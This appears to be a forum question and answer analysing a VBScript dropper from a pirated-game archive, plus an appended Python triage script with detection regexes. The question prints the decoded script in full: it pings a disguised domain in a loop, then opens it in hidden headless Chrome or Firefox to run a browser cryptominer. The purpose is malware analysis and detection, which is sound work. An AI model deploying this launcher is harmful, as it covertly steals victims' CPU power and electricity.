I downloaded a game from oceanofgames.com. There is an archive in it named "Step 2 - Extract Setup.rar". It is in almost every game downloaded from oceanofgames.com. When I extract and run it, it is detected as malware. I have Avast; it shows this message
It creates "Windows Updates service.vbs" and "encode.vbs" in %appdata%\Windows Updates Files. "encode.vbs" converts "Windows Updates service.vbs" to "Windows Updates service.vbe" and then runs it. I decoded the vbe file. Please tell me what this is doing.
' Silence all runtime errors so the script never stops on a failure
on Error Resume Next

' Sleeps NSeconds * 3 seconds (WScript.Sleep takes milliseconds)
Sub Pause(NSeconds)
    Wscript.Sleep(NSeconds*3000)
End Sub

Dim visualcpp
Set visualcpp = CreateObject("WScript.Shell")

' Wait until the remote site answers one ping (hidden window, wait for exit),
' retrying roughly every 63 seconds while it is unreachable
counter = True
While counter = True
    website = "www.google.com.739471594492594.windows-display-service.com"
    checkstring = "ping -n 1 -w 300 " & website
    status = visualcpp.Run(checkstring, 0 , True)
    If status = 0 Then
        counter = False
    Else
        Pause(21)
    End If
Wend

' Open the site in a hidden headless Chrome; if that fails, create a Firefox
' profile named "user" and open the site in a hidden headless Firefox instead
returncodestatus = "1"
returncodestatus = visualcpp.run("chrome --headless --disable-gpu --remote-debugging-port=9222 http://www.google.com.739471594492594.windows-display-service.com",0,false)
if returncodestatus <> 0 then
    returncodestatus=visualcpp.run("firefox -no-remote -CreateProfile user",0,false)
    returncodestatus=visualcpp.run("firefox -no-remote -headless -new-instance -P ""user"" --start-debugger-server ws:6000 http://www.google.com.739471594492594.windows-display-service.com",0,false)
End If
The URL in variable "website" is blacklisted by Avast.
It is slowing down your computer and stealing your electricity by abusing half of your CPU power for mining cryptocurrency in a hidden browser window. See this article for a full breakdown of this shady tactic. So yes, it is malware.
What the file does is check whether www.google.com.739471594492594.windows-display-service.com is available by pinging it. It will try this in a loop if it isn't. If it is, it will then attempt to open a headless Chrome instance, or if that fails (for example because Chrome is not installed), it will create a new hidden Firefox profile called "user" and open a headless Firefox instance with that profile. In any case, the aforementioned website is opened there.
That website - whose domain is made to look more legitimate by adding www.google.com. at the start and using windows in it - consists of a number of bogus articles (probably stolen from elsewhere), but most importantly it also loads a WebAssembly-based crypto mining software and executes it with half the number of threads that your CPU has, effectively stealing half of your CPU power. It will attempt to mine some cryptocurrency that then gets credited to the authors of this malware.
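An added triage helper, not part of the question or answer above, that turns the behaviours the answer describes into detection heuristics and checks for the persistence files named in the question. The regex labels, the three-hit threshold and the condensed SAMPLE text are my own constructions; the domain and file names come from the question.

```python
"""Triage a decoded VBScript for the hidden-browser cryptominer launcher pattern."""
import os
import re
from pathlib import Path

# Persistence location and file names taken from the question.
DROP_DIR = Path(os.environ.get("APPDATA", "")) / "Windows Updates Files"
DROP_FILES = ("Windows Updates service.vbs", "Windows Updates service.vbe", "encode.vbs")
KNOWN_DOMAIN = "windows-display-service.com"

# Behaviours the answer describes, each as (label, regex) over the decoded script.
HEURISTICS = (
    ("errors silenced (On Error Resume Next)", r"\bOn\s+Error\s+Resume\s+Next\b"),
    ("connectivity check loop using ping", r"\bWhile\b[\s\S]*?\bping\s+-n\s+1\b[\s\S]*?\bWend\b"),
    ("hidden shell execution (window style 0)", r"\.Run\([^\n]*,\s*0\s*,"),
    ("headless Chrome with remote debugging", r"chrome[^\n]*--headless[^\n]*--remote-debugging-port"),
    ("headless Firefox with a throwaway profile", r"firefox[^\n]*-CreateProfile|firefox[^\n]*-headless"),
    ("contacts the known miner domain", re.escape(KNOWN_DOMAIN)),
)

def triage_script(text):
    """Return the labels of every heuristic that matches the decoded script text."""
    return [label for label, pat in HEURISTICS if re.search(pat, text, re.I)]

def is_miner_launcher(text):
    """Flag when the known domain appears or at least three behaviours co-occur."""
    hits = triage_script(text)
    return any("known miner domain" in h for h in hits) or len(hits) >= 3

def find_dropped_files():
    """List which of the persistence files from the question exist on this machine."""
    return [p for p in (DROP_DIR / n for n in DROP_FILES) if p.is_file()]

# Constructed sample: a condensed copy of the decoded script from the question.
SAMPLE = """on Error Resume Next
Set visualcpp = CreateObject("WScript.Shell")
While counter = True
checkstring = "ping -n 1 -w 300 " & website
status = visualcpp.Run(checkstring, 0 , True)
Wend
returncodestatus = visualcpp.run("chrome --headless --disable-gpu --remote-debugging-port=9222 http://www.google.com.739471594492594.windows-display-service.com",0,false)
"""

if __name__ == "__main__":
    for hit in triage_script(SAMPLE):
        print("-", hit)
    print("verdict:", "miner launcher" if is_miner_launcher(SAMPLE) else "not flagged")
    print("dropped files present:", find_dropped_files())
```

On a Windows machine, a non-empty result from find_dropped_files() confirms the persistence files are still in place after the archive was run.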